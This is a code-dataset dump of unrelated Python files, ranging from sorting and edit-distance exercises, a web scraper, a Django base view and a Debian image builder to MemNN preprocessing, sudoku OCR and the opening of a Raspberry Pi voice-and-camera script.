list[start]\n\n\ndef selection_sort(list, start, end):\n if start < len(list):\n for i in range(start, min(end, len(list))):\n minimum = i\n for j in range(i+1, min(end+1, len(list))):\n if list[j] < list[minimum]:\n minimum = j\n list[i], list[minimum] = list[minimum], list[i]\n\n\ndef get_pivot_by_five(list, start, end):\n order_of_pack = 0\n length = end - start + 1\n if length < 3:\n return list[end]\n while 2 + (order_of_pack * 5) < length:\n selection_sort(list, order_of_pack * 5, order_of_pack * 5 + 4)\n order_of_pack += 1\n medians = [v for i, v in enumerate(list[start:end+1]) if i in range(2, length, 5)]\n return get_order_statistics(medians, 0, len(medians)-1, ceil(len(medians)/2))\n\n\n\n\na = [1,2]\nfor i in range(1, len(a)+1):\n print(get_order_statistics(a, 0, len(a)-1, i))","sub_path":"order_statistics.py","file_name":"order_statistics.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"106011916","text":"import pandas as pd\nfrom sqlalchemy import create_engine\nengine = create_engine('sqlite://', echo=False)\ndf = pd.read_csv('buddymove_holidayiq.csv')\ndf.to_sql(name='review',con=engine)\n\nengine.execute('SELECT count(Sports) FROM review').fetchall()\nengine.execute('''SELECT count(Sports)\nFROM review as r\nWHERE (r.Nature >= 100) AND (r.Shopping > 100)\n''').fetchall()\n\nprint(engine.execute('''SELECT AVG(Sports), AVG(Religious), AVG(Nature), AVG(Theatre), AVG(Shopping), AVG(Picnic)\nFROM review as 
r\n''').fetchall())","sub_path":"module1-introduction-to-sql/buddymove_holidayiq.py","file_name":"buddymove_holidayiq.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"94257024","text":"################################################################################\n# Will Macxy\n# Hot Air Blog Scraper\n# Last Updated : 4/22/2021\n################################################################################\n\nfrom bs4 import BeautifulSoup as s\nfrom urllib.request import Request, urlopen\nimport sys\nimport re\nimport csv\n\n\n# Function to scrape an individual blog post, used by the main function\ndef scrape(url,status,root):\n\n\treq = Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n\n\twebpage = urlopen(req).read()\n\n\tsoup = s(webpage, \"lxml\")\t\n\n\t#variable names\n\ttitle = soup.find('title')\n\tdate = re.findall(r'[0-9][0-9][0-9][0-9]\\/[0-9][0-9]\\/[0-9][0-9]',url)\n\tauthor = soup.find('meta', attrs={'name':'author'})\n\tbody = soup.find_all('p')\n\tbody = body[:-1]\n\n\t#cleaning of text\n\ttextTitle = title.get_text().replace(',','')[:-8]\n\ttextDate = date[0].replace('/','-')\n\ttextAuthor = author['content']\n\n\ttextBody = textTitle + ', '+ textAuthor + \", \" + textDate + \", \"\n\n\t#creation of text body\n\tfor text in body:\n\t\ttextBody = textBody + text.get_text().replace(',','')+' '\n\n\ttextBody = 'C, ' + textBody + '\\n'\n\t\n\t#creation of file and file name\n\tblogTitle = 'C HotAir '+textAuthor+' '+textTitle+'.csv'\n\tinvalid = '<>:\\\"\\\\|?*\\'/\\n'\n\tfor char in invalid:\n\t\tblogTitle = blogTitle.replace(char,'')\n\t\n\t#terminal output\n\tstep = '[+] HA: '+textTitle\n\tstatus['text'] = \"{}\".format(step)\n\troot.update()\n\n\t#writing of file\n\tfile = open(sys.path[0]+\"/Blogs/SavedBlogs/\"+blogTitle , \"w+\", encoding = 'utf-8')\n\tfile.write(textBody)\n\tfile.close()\n\t\n\n\treturn('HotAir: '+textTitle)\n\n#main function, used to find the dynamic blog listing page\ndef main(status,root):\n\t\n\tfor i in range(1,3):\n\t\t#start page, 50 entries per page\n\t\tstartPage = i\n\t\t#number of blog posts on page request, 50 max\n\t\tnumPosts = 50\n\n\t\t#variable names\n\t\turl = 'https://hotair.com/page/'+str(startPage)+'?ordinal='+str(numPosts)\n\t\treq = Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n\t\twebpage = urlopen(req).read()\n\t\tsoup = s(webpage, \"html.parser\")\n\t\tlinks = soup.find_all(class_='wp-card__img mt-2')\n\t\tlinkList = []\n\t\t\n\t\t#loop that collects individual blog post urls\n\t\tfor link in links:\n\t\t\tlinkList.append(str('https://hotair.com') + link.find('a').get('href'))\n\n\t\t#loop that scrapes individual blog posts\n\t\tfor link in linkList:\n\t\t\tscrape(link,status,root)\n\n\t\n\treturn()\n\n","sub_path":"Blogs/AHotAirScraper.py","file_name":"AHotAirScraper.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"587022101","text":"from debimgbuilder.builder import DebianBuilder, DebianRepo\n\n\nclass JessieImageBuilder(DebianBuilder):\n def __init__(self, image_name, base_path,\n mirror='http://httpredir.debian.org/debian',\n suite='jessie',\n variant='minbase',\n base_components=None,\n repo_sources=None):\n if base_components is None:\n base_components = ['main', 'contrib']\n if repo_sources is None:\n repo_sources = []\n super().__init__(\n image_name,\n base_path,\n mirror,\n suite,\n variant,\n base_components,\n 
repo_sources\n )\n\n def setup_apt_sources(self):\n super().setup_apt_sources()\n # Add jessie-updates\n self.repo_sources.append(\n DebianRepo(\n self.mirror,\n 'jessie-updates',\n self.base_components,\n )\n )\n\n\nclass JessieBackportsImageBuilder(JessieImageBuilder):\n def setup_apt_sources(self):\n super().setup_apt_sources()\n # Add jessie-backports\n self.repo_sources.append(\n DebianRepo(\n self.mirror,\n 'jessie-backports',\n self.base_components,\n )\n )\n","sub_path":"debimgbuilder/jessie.py","file_name":"jessie.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"137374968","text":"#! /usr/bin/python3\n\n# Copyright(c) 2019 note.jorhelp.cn\n\n# Authored by Jorhelp on: Monday, June 17, 2019 20:29:45 CST\n\n# @desc: Minimum edit distance\n\n\n# There are three operations in total: delete, insert, replace\n\nt=int(input().strip()) # number of test cases\nfor ttt in range(t):\n la,lb=map(int, input().strip().split()) # lengths of the two strings\n a,b=input().strip().split() # the two strings\n\n re=[[0]*(lb+1) for i in range(la+1)] # build the DP table\n\n for i in range(la+1):\n for j in range(lb+1):\n # If the first string is empty, the answer is the length of the second string (all inserts)\n if i==0:\n re[i][j]=j\n # If the second string is empty, the answer is the length of the first string (all deletes)\n elif j==0:\n re[i][j]=i\n\n # If the two characters are equal, no edit is needed; the answer is re[i-1][j-1]\n elif a[i-1]==b[j-1]:\n re[i][j]=re[i-1][j-1]\n\n # Otherwise, pick the cheapest edit\n else:\n re[i][j]=1+min(re[i][j-1], # insert\n re[i-1][j-1], # replace\n re[i-1][j]) # delete\n print(re[-1][-1])\n","sub_path":"DS_and_Algo/最短编辑距离.py","file_name":"最短编辑距离.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"381281343","text":"# -*- coding: utf-8 -*-\n\nimport pluggy\nimport buildpy_server\nfrom . import log\n\nlogger = log.get_logger(__name__)\n\nhookimpl = pluggy.HookimplMarker('buildpy-server')\n\n\n@hookimpl\ndef buildpyserver_add_parser_options(parser):\n build = parser.add_group(\"build options\")\n build.add_option(\"--version\", action=\"store_true\",\n help=\"show buildpy version (%s)\"\n % buildpy_server.__version__)\n","sub_path":"src/buildpy_server/parseroptions.py","file_name":"parseroptions.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"584069327","text":"# -*- coding: utf-8 -*-\n'''\nTask 7.3b\n\nMake a copy of the script from task 7.3a.\n\nExtend the script:\n- Ask the user to enter a VLAN number.\n- Display information only for the specified VLAN.\n\nRestriction: All tasks must be completed using only the topics covered so far.\n\n'''\nvlan_number = input('Input vlan number: ')\n\nwith open ('CAM_table.txt', 'r') as f:\n for line in f:\n line = line.split()\n if line == []:\n continue\n if line[0].isdigit() and line[0] == vlan_number:\n line.pop(2)\n line = \" \".join(line)\n print(line)\n else:\n continue\n","sub_path":"exercises/07_files/task_7_3b.py","file_name":"task_7_3b.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"357079082","text":"class BankAccount():\n def __init__(self, balance, int_rate): \n self.balance=balance\n self.int_rate=int_rate # store the rate that was passed in instead of hard-coding 0.01\n def deposit(self, amount):\n self.balance+=amount\n return self\n def withdrawal(self, amount):\n if(amount>self.balance):\n print(\"Insufficient funds: Charging a $5 fee\")\n self.balance-=5\n return self\n else:\n self.balance-=amount\n return self\n def display_account_info(self):\n print(self.balance)\n def yield_interest(self):\n if 
self.balance>0:\n self.balance= self.balance+(self.balance*self.int_rate)\n return self\n return self\n\ncerryl= BankAccount(90,0.01)\nleyladin= BankAccount(2000,0.03)\n\n\ncerryl.deposit(500).deposit(2500).deposit(3500).withdrawal(1500).yield_interest().display_account_info()\n\nleyladin.deposit(2500).deposit(700).withdrawal(200).withdrawal(500).withdrawal(800).withdrawal(400).yield_interest().display_account_info()","sub_path":"Python_Assignments/pythonPractice.py","file_name":"pythonPractice.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"332903004","text":"# constructor and self\n\n# Every time an object is created, it is allocated in a new memory space.\nclass New:\n pass\n\n\nc1 = New()\nprint(id(c1))\n\n\n# Let's learn how to update attributes\nclass Update:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def update(self):\n self.age = 25\n print('name:',self.name, 'age:',self.age)\n\n\na = Update('Hpa', 20)\na.update()\n\n# Another way of doing it\nclass Exupdate:\n def __init__(self):\n self.name = 'rpa'\n self.age = 29\n def exup(self):\n self.age = 30\n print('name:',self.name, 'age:', self.age)\nb = Exupdate()\nb.name = 'John'\nb.exup()\n","sub_path":"object oriented/constructor and self.py","file_name":"constructor and self.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"406411772","text":"# coding=utf-8\n\nfrom django.views.generic import TemplateView\n\nfrom django.utils.http import urlencode\n\nclass BaseView(TemplateView):\n '''\n Base View class for the admin backend\n by:范俊伟 at:2015-01-21\n Base class for front-end pages; login is not required by default\n by:王健 at:2015-01-25\n '''\n\n # Whether login is required; required by default\n # by:范俊伟 at:2015-01-21\n # Changed to not require login by default\n # by:范俊伟 at:2015-01-21\n need_site_permission = False\n\n # Page template\n # by:范俊伟 at:2015-01-21\n template_name = 'webhtml/base.html'\n\n def get_context_data(self, **kwargs):\n '''\n Fetch the variables needed by the template\n by:范俊伟 at:2015-01-21\n Variables needed by the customer-service system\n by: 范俊伟 at:2015-05-21\n '''\n kwargs = super(BaseView, self).get_context_data(**kwargs)\n kwargs['url'] = self.request.get_full_path()\n # kwargs['kf_url'] = settings.NEED_KF_BASE_URL\n kwargs['sessionid'] = self.request.session.session_key\n if hasattr(self, 'form'):\n kwargs['form'] = self.form\n return kwargs\n\n def get_query_string(self, new_params=None, remove=None):\n '''\n Return the query string of the current URL\n by:范俊伟 at:2015-01-21\n :param new_params: new parameters to add, given as a dict\n :param remove: fields to strip, given as a list\n '''\n if new_params is None:\n new_params = {}\n if remove is None:\n remove = []\n p = dict(self.request.GET.items()).copy()\n for r in remove:\n for k in list(p.keys()): # copy the keys so the dict can be mutated while iterating\n if k.startswith(r):\n del p[k]\n for k, v in new_params.items():\n if v is None:\n if k in p:\n del p[k]\n else:\n p[k] = v\n qs = urlencode(p)\n if qs:\n return '?%s' % qs\n else:\n return ''\n\n def isPhoneRequest(self):\n \"\"\"\n Check whether the request comes from a phone\n by: 范俊伟 at:2015-03-11\n \"\"\"\n if self.kwargs.get('isPhone'):\n return True\n elif self.kwargs.get('isPC'):\n return False\n elif self.request.browserGroup == 'smart_phone' or self.request.browserGroup == 'feature_phone':\n return True\n else:\n return False\n\n def isSmartPhone(self):\n \"\"\"\n Check whether the client is a smartphone\n by: 尚宗凯 at: 2015-03-27\n \"\"\"\n if self.request.browserGroup == 'smart_phone':\n return True\n else:\n return False\n\n # @classonlymethod\n # @admin_view_decorator\n def as_view(cls, **initkwargs):\n '''\n Create the view callable needed by the URL conf\n by:范俊伟 at:2015-01-21\n '''\n return super(BaseView, 
cls).as_view(**initkwargs)","sub_path":"util/baseview.py","file_name":"baseview.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"464716378","text":"from collections import Counter\nfrom typing import Dict, List\n\nimport config\n\n\ndef filter_rating_values(contents: List[str], most: bool) -> int:\n \"\"\"Filter ratings until one line in contents is left.\n\n Return the integer representation of the last line.\n\n Args:\n contents (List[str]): the file contents\n most (bool): whether to take the most or least of counter;\n if True and both counts of 0 and 1 are equal, 1 is taken\n\n Returns:\n int: integer representation of last matching line\n\n \"\"\"\n for col, _ in enumerate(contents[0]):\n if len(contents) == 1:\n return int(contents[0], base=2)\n\n col_contents = [line[col] for line in contents]\n count = Counter(col_contents)\n most_common = count.most_common(1)[0]\n\n if most_common[0] == '1' or count['1'] == most_common[1]:\n value = '1' if most else '0'\n else:\n value = '0' if most else '1'\n\n contents = [line for line in contents if line[col] == value]\n\n return int(contents[0], base=2)\n\n\ndef determine_life_support_rating(contents: List[str]) -> int:\n \"\"\"Determine life support rating by multiplying OGR by CO2SR.\n\n OGR is \"oxygen generator rating\".\n CO2SR is \"CO2 scrubber rating\".\n\n Args:\n contents (List[str]): the file contents\n\n Returns:\n int: life support rating\n\n \"\"\"\n oxygen_generator_rating = filter_rating_values(contents, True)\n co2_scrubber_rating = filter_rating_values(contents, False)\n\n return oxygen_generator_rating * co2_scrubber_rating\n\n\ndef main() -> None:\n \"\"\"Run the main code.\"\"\"\n test_answer = 230\n test_file = config.TestFile(test_answer)\n test = determine_life_support_rating(test_file.contents)\n test_file.test(test)\n\n file = config.File()\n result = determine_life_support_rating(file.contents)\n config.LOGGER.info(result)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"2021/03/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"612845197","text":"# import for python 2.7\n#from io import open\n#\nimport itertools\nimport scipy.sparse as sparse\nfrom MemNN.common import split_line, clean_words\n\ndef process_fact(line):\n # Arg: \"entity \\t rel \\t obj1 obj2 ob3 ...\"\n # Return: (entity rel obj1 obj2 obj3 ....)\n [entity, rel, obj] = line.rstrip().split('\\t')\n return entity, rel, obj.split(' ')\n\n\ndef symbols_bag(kb):\n \"\"\"\n\n Note:\n collect symbols from knowledge base\n\n Args:\n kb : knowledge base's path\n\n Returns:\n symbol_list, symbol2index\n\n \"\"\"\n print (\"processing Knowledge base to bag-of-symbole\")\n\n # symbol_list\n all_symbol = set()\n with open(kb, encoding=\"utf8\") as f_in:\n for l in f_in:\n entity, rel, objs = process_fact(l)\n all_symbol.update([entity, rel])\n all_symbol.update(objs)\n symbol_list = list(all_symbol)\n print (\"%d symbols have been processed\" % len(symbol_list))\n symbol_list.sort()\n\n # symbol2index\n symbol2index = {}\n symbol2index.update(zip(symbol_list, itertools.count()))\n return symbol_list, symbol2index\n\n\ndef ngram_bag(corpus_list, labels):\n \"\"\"\n\n Note:\n collect ngrams from dataset\n\n Args:\n corpus_list: list of dataset similar to SimpleQuestion train/test/valid\n labels: labels of entity in Knowledge base\n\n 
Returns:\n vocabulary, voc2index\n\n \"\"\"\n # vocabulary\n print (\"processing corpus to bag-of-words\")\n words = set()\n line_ctr = itertools.count()\n\n # words in questions\n for ds in corpus_list:\n with open(ds, encoding=\"utf8\") as in_f:\n for line in in_f:\n try:\n line_number = next(line_ctr)\n words.update(clean_words(split_line(line)))\n except IndexError:\n print (\"Index Error in line %d\" % line_number)\n\n # word in labels\n for l in labels:\n words.update(l.split())\n vocabulary = list(words)\n print (\"%d words have been processed\" % len(vocabulary))\n vocabulary.sort()\n\n # voc2index\n voc2index = {}\n voc2index.update(zip(vocabulary, itertools.count()))\n return vocabulary, voc2index\n\n# preprocessing Freebase facts: transform a fact (s, r, {o1, ... ok} to vector with a bag-of-symbole\ndef f_y(symbols2index, kb):\n \"\"\"\n\n Note:\n preprocessing knowledge base\n\n Args:\n symbols2index: mapping object\n kb: knowledge base's path\n\n Returns:\n mx: knowledge matrix\n knowledgebase_size: number of facts \n candidate_mx: subject and relationship matrix\n responses: mapping number of fact to objects\n\n \"\"\"\n line_ctr = itertools.count()\n data_tuples = list()\n responses = dict()\n candidate_tuple = list()\n\n with open(kb, encoding=\"utf8\") as f_in:\n for l in f_in:\n entity, rel, objs = process_fact(l)\n l = next(line_ctr)\n data_tuples.append((1.0, l, symbols2index[entity]))\n data_tuples.append((1.0, l, symbols2index[rel]))\n candidate_tuple.append((1.0, l, symbols2index[entity]))\n candidate_tuple.append((1.0, l, symbols2index[rel]))\n data_tuples.extend([(1./len(objs), l, symbols2index[o]) for o in objs])\n responses[l] = objs\n data, row, col = zip(*data_tuples)\n candidate_data, candidate_row, candidate_col = zip(*candidate_tuple)\n\n knowledgebase_size = next(line_ctr)\n symbol_size = len(symbols2index.keys())\n\n mx = sparse.csr_matrix((data, (row, col)), shape=(knowledgebase_size,symbol_size))\n candidate_mx = sparse.csr_matrix((candidate_data, (candidate_row, candidate_col)), shape=(knowledgebase_size,symbol_size))\n return mx, knowledgebase_size, candidate_mx, responses\n\ndef f_y_facts(symbols2index, dataset):\n \"\"\"\n\n Note:\n preprocessing facts in dataset\n\n Args:\n symbols2index: mapping object\n dataset: dataset similar to SimpleQuestion train/valid/test\n\n Returns:\n mx: fact matrice\n\n \"\"\"\n line_ctr = itertools.count()\n data_tuples = list()\n for l in dataset:\n entity, rel, obj, question = l.rstrip().split('\\t')\n l = next(line_ctr)\n data_tuples.append((1.0, l, symbols2index[entity]))\n data_tuples.append((1.0, l, symbols2index[rel]))\n data_tuples.append((1.0, l, symbols2index[obj]))\n\n data, row, col = zip(*data_tuples)\n mx = sparse.csr_matrix((data, (row, col)))\n return mx\n\ndef g_q(symbols2index, voc2index, dataset):\n \"\"\"\n\n Note:\n preprocessing dataset\n\n Args:\n symbols2index: map symbol to index\n voc2index: map word to index\n dataset: dataset similar to SimpleQuestion train/valid/test\n\n Returns:\n f_mx: fact matrice\n q_mx: question matrice\n M: number of records in dataset\n\n \"\"\"\n line_ctr = itertools.count()\n data_tuples = list()\n fact_tuples = list()\n with open(dataset, encoding=\"utf8\") as in_f:\n for line in in_f:\n l = next(line_ctr)\n fact_tuples.extend([(1, l, symbols2index[s]) for s in line.split(\"\\t\")[0:3]])\n data_tuples.extend([(1, l, voc2index[w]) for w in clean_words(split_line(line))])\n\n f_data, f_row, f_col = zip(*fact_tuples)\n q_data, q_row, q_col = zip(*data_tuples)\n M = 
next(line_ctr)\n N = len(symbols2index.keys())\n O = len(voc2index.keys())\n\n f_mx = sparse.csr_matrix((f_data, (f_row, f_col)), shape=(M, N))\n q_mx = sparse.csr_matrix((q_data, (q_row, q_col)), shape=(M, O))\n return f_mx, q_mx, M\n\ndef g_q_single_question(voc2index, question):\n \"\"\"\n\n Note:\n preprocessing single question\n\n Args:\n voc2index: map word to index\n question: question in natural language\n\n Returns:\n q_mx: question vector\n\n \"\"\"\n data_tuples = list()\n\n data_tuples.extend([(1, 0, voc2index[w]) for w in clean_words(question.strip().lower().split(' ')) if voc2index[w]])\n q_data, q_row, q_col = zip(*data_tuples)\n\n O = len(voc2index.keys())\n\n q_mx = sparse.csr_matrix((q_data, (q_row, q_col)), shape=(1, O))\n return q_mx\n\ndef negative_exemples_generation(symbols2index, kb):\n \"\"\"\n\n Note:\n generate negative examples from knowledge base\n\n Args:\n symbols2index: map symbol to index\n kb: knowledge base's path\n\n Returns:\n mx: negative example matrice\n M: number of negative examples\n\n \"\"\"\n line_ctr = itertools.count()\n data_tuples = list()\n with open(kb, encoding=\"utf8\") as f_in:\n for l in f_in:\n entity, rel, objs = process_fact(l)\n for o in objs:\n l = next(line_ctr)\n data_tuples.append((1.0, l, symbols2index[entity]))\n data_tuples.append((1.0, l, symbols2index[rel]))\n data_tuples.append((1.0, l, symbols2index[o]))\n\n data, row, col = zip(*data_tuples)\n M = next(line_ctr)\n N = len(symbols2index.keys())\n mx = sparse.csr_matrix((data, (row, col)), shape=(M,N))\n return mx, M\n\n","sub_path":"MemNN/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":7035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"435162603","text":"#/bin/env python3\n\nimport cv2,sys\nimport numpy as np\nfrom PIL import Image\nfrom pytesseract import image_to_string\n\ndef dist_line(p1,p2,p3):\n x1,y1 = p1[0]\n x2,y2 = p2[0]\n x0,y0 = p3[0]\n return ((y2 - y1) * x0 - (x2 - x1) * y0 + x2*y1 - y2*x1) / np.sqrt((y2-y1)**2 + (x2 - x1) ** 2)\n\ndef fix_poly(polygon):\n ret = np.array([ [0,0],[0,0],[0,0],[0,0] ],np.float32)\n min_ = np.sqrt(polygon[0][0][0]**2 + polygon[0][0][1]**2)\n minc = 0\n for i in range(1,4):\n if np.sqrt(polygon[i][0][0]**2 + polygon[i][0][1]**2) < min_:\n min_ = np.sqrt(polygon[i][0][0]**2 + polygon[i][0][1]**2)\n minc = i\n\n #found top left vertex, rotate until it's on the top left\n for i in range(minc):\n polygon = np.roll(polygon,-1,axis=0)\n\n #if needed, \"invert\" the order.\n dist1 = dist_line(polygon[0],polygon[2],polygon[1])\n dist3 = dist_line(polygon[0],polygon[2],polygon[3])\n if dist3 > dist1:\n x = polygon[3][0][0]\n y = polygon[3][0][1]\n polygon[3][0][0] = polygon[1][0][0]\n polygon[3][0][1] = polygon[1][0][1]\n polygon[1][0][0] = x\n polygon[1][0][1] = y\n ret[0] = polygon[0][0]\n ret[1] = polygon[1][0]\n ret[2] = polygon[2][0]\n ret[3] = polygon[3][0]\n return ret\n\ndef to_binary(image):\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray_image = cv2.GaussianBlur(gray_image,(5,5),0)\n image2 = cv2.adaptiveThreshold(gray_image,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY_INV ,75,5)\n return image2\n\ndef get_tile(image):\n image2 = to_binary(image)\n\n contours, hierarchy = cv2.findContours(image2, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n biggest = None\n max_area = 0\n for i in contours:\n area = cv2.contourArea(i)\n if area > 100:\n peri = cv2.arcLength(i,True)\n approx = cv2.approxPolyDP(i,0.02*peri,True)\n if area > max_area 
and len(approx)==4:\n biggest = approx\n max_area = area\n\n\n dst_bounds = np.array([ [0,0],[899,0],[899,899],[0,899] ],np.float32)\n biggest = fix_poly(biggest)\t# we put the corners of biggest square in CW order to match with h\n\n transform = cv2.getPerspectiveTransform(biggest,dst_bounds)\t# apply perspective transformation\n warp = cv2.warpPerspective(image,transform,(900,900))\n return warp\n\n\n\ndef train(): #from opencv tutorial\n img = cv2.imread('digits.png')\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n # Now we split the image to 5000 cells, each 20x20 size\n cells = [np.hsplit(row,100) for row in np.vsplit(gray,50)]\n\n # Make it into a Numpy array. It size will be (50,100,20,20)\n x = np.array(cells)\n\n # Now we prepare train_data and test_data.\n train = x[:,:50].reshape(-1,400).astype(np.float32) # Size = (2500,400)\n test = x[:,50:100].reshape(-1,400).astype(np.float32) # Size = (2500,400)\n\n # Create labels for train and test data\n k = np.arange(10)\n train_labels = np.repeat(k,250)[:,np.newaxis]\n test_labels = train_labels.copy()\n\n # Initiate kNN, train the data, then test it with test data for k=1\n knn = cv2.KNearest()\n knn.train(train,train_labels)\n return knn\n\ndef avg_distance(point,contour):\n dists = [ np.sqrt((point[0] - i[0][0])**2 +(point[1] - i[0][1])**2 ) for i in contour]\n return sum(dists) / len(dists)\n\ndef get_number(image):\n image2 = image.copy()\n contours, hierarchy = cv2.findContours(image2, cv2.RETR_TREE, cv2.CHAIN_APPROX_TC89_L1)\n closest = None\n flag = False\n max_dist = 500 #outside of 100x100 image\n arr = []\n for i in contours:\n area = cv2.contourArea(i)\n dist = avg_distance((50,50),i)\n peri = cv2.arcLength(i,True)\n # dist = cv2.pointPolygonTest(i,(len(image)/2,len(image[0])),True)\n if peri > 100 and dist < max_dist and dist < 40:\n flag = True\n max_dist = dist\n closest = i\n if not flag:\n return None\n arr.append(closest)\n # dst_bounds = np.array([ [0,0],[19,0],[19,19],[0,19] ],np.float32)\n # biggest = fix_poly(biggest)\t# we put the corners of biggest square in CW order to match with h\n #\n # transform = cv2.getPerspectiveTransform(biggest,dst_bounds)\t# apply perspective transformation\n # warp = cv2.warpPerspective(image,transform,(20,20))\n return arr\n\ndef contour_mask(image,contour):\n mask = np.zeros_like(image)\n cv2.drawContours(mask, contour, -1, 255,thickness=-1)\n res = cv2.bitwise_and(image,image,mask = mask)\n return res\n\ndef get_numbers(image):\n warp = get_tile(image)\n\n bw = to_binary(warp)\n #\n # cv2.imshow(\"bw\",bw)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n sudoku = []\n for i in range(9):\n ln = []\n for j in range(9):\n ln.append(bw[i*100:(i+1)*100, j*100:(j+1)*100 ])\n sudoku.append(ln)\n\n # knn = train()\n nimg = np.zeros((900,900,3), np.uint8)\n\n sudoku_contour = []\n for i in range(9):\n ln = []\n for j in range(9):\n im = get_number(sudoku[i][j])\n ln.append(im)\n sudoku_contour.append(ln)\n\n numbers = []\n for i in range(9):\n ln = []\n for j in range(9):\n if sudoku_contour[i][j] == None:\n ln.append(0)\n else:\n im = contour_mask(sudoku[i][j],sudoku_contour[i][j])\n result = image_to_string(Image.fromarray(im),config=\"-psm 6\")\n # im = cv2.resize(im,(20,20))\n # (result,_,_,_) = knn.find_nearest(im.reshape(-1,400).astype(np.float32),5)\n ln.append(int(result))\n numbers.append(ln)\n\n return numbers,warp\n\ndef print_numbers(image,numbers):\n for i in range(9):\n for j in range(9):\n cv2.putText(image,\"%d\" % ( int(numbers[i][j]) ) ,(30 + 
100*j,80+100*i),1,5,(0,0,255),5)\n","sub_path":"sudokuFlask/sudoku/get_numbers.py","file_name":"get_numbers.py","file_ext":"py","file_size_in_byte":5862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"505621709","text":"# The following sample file called studentdata.txt contains one line for each\n# student in an imaginary class. The student’s name is the first thing on each\n# line, followed by some exam scores. The number of scores might be different\n# for each student.\n#\n# joe 10 15 20 30 40\n# bill 23 16 19 22\n# sue 8 22 17 14 32 17 24 21 2 9 11 17\n# grace 12 28 21 45 26 10\n# john 14 32 25 16 89\n#\n# Using the text file studentdata.txt write a program that prints out the\n# names of students that have more than six quiz scores.\n\n\ndef average(lst):\n return sum(lst) / len(lst)\n\n\ndef main():\n file_ref = open(r'w:\lc101\Hacker Chapter - Files\studentdata.txt', 'r') # raw string so the backslashes are taken literally\n line = file_ref.readline()\n while line:\n words = line.split()\n exam_score_count = len(words) - 1 # Don't count student name\n if exam_score_count > 6: # only students with more than six quiz scores, as the task asks\n student = words[0]\n exam_scores = [int(word) for word in words[1:]]\n average_grade = average(exam_scores)\n print(\"Student: {} - Avg Grade: {:.1f}\".format(student,\n average_grade))\n line = file_ref.readline()\n file_ref.close()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"unit1/Hacker Chapter - Files/Files - Exercise 02.py","file_name":"Files - Exercise 02.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"139512467","text":"#!/usr/bin/python3.5\n#Voice Recognition\nimport speech_recognition as sr\nimport os\nimport unidecode\n\n#Image Capturing\nimport datetime\nimport sys\nimport time\nimport subprocess\n\n#Store Image\nimport mysql.connector\nfrom mysql.connector import Error\n\n#Turn on/off LEDs\nimport RPi.GPIO as GPIO\n\n#Library to read CSV\nimport csv\nimport json\n\n#Library to export data\nimport paramiko\n\ntime.sleep(10)\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(12, GPIO.OUT)\nGPIO.setup(20, GPIO.OUT)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(16, GPIO.OUT)\n\nproxy = None\nhosts = ('google.com', 'kernel.org', 'yahoo.com')\nlocalhost = ('10.0.5.246')\n\nwith open('/home/pi/Documents/visualizacion_photo/seg.json', 'r', encoding='utf-8') as json_data:\n vrb = json.load(json_data)\n\ndef ping(host):\n ret = subprocess.call(['ping', '-c', '3', '-W', '5', host],\n stdout=open('/dev/null', 'w'),\n stderr=open('/dev/null', 'w'))\n return ret == 0\n\ndef net_is_up():\n print (\"[%s] Checking if network is up...\" % str(datetime.datetime.now()))\n \n xstatus = 0\n for h in hosts:\n if ping(h):\n if ping(localhost):\n print (\"[%s] Network is up!\" % str(datetime.datetime.now()))\n xstatus = 1\n break\n\n if not xstatus:\n time.sleep(10)\n print (\"[%s] Network is down :(\" % str(datetime.datetime.now()))\n time.sleep(25)\n\n return xstatus\n\ndef get_name(Name):\n reader = csv.reader(open(\"nombres.csv\", \"rt\"), delimiter=\",\")\n x=list(reader)\n\n Name2=Name[1]\n Name2=Name2.upper()\n\n for item in x:\n if str(Name2) == item[0]:\n return Name[0], Name2, True\n break\n return Name[0], \"\", False\n\ndef store(path, name, person, nameservidor):\n while True:\n if(net_is_up()):\n try:\n #Connection and insert with mysql complete\n mydb = 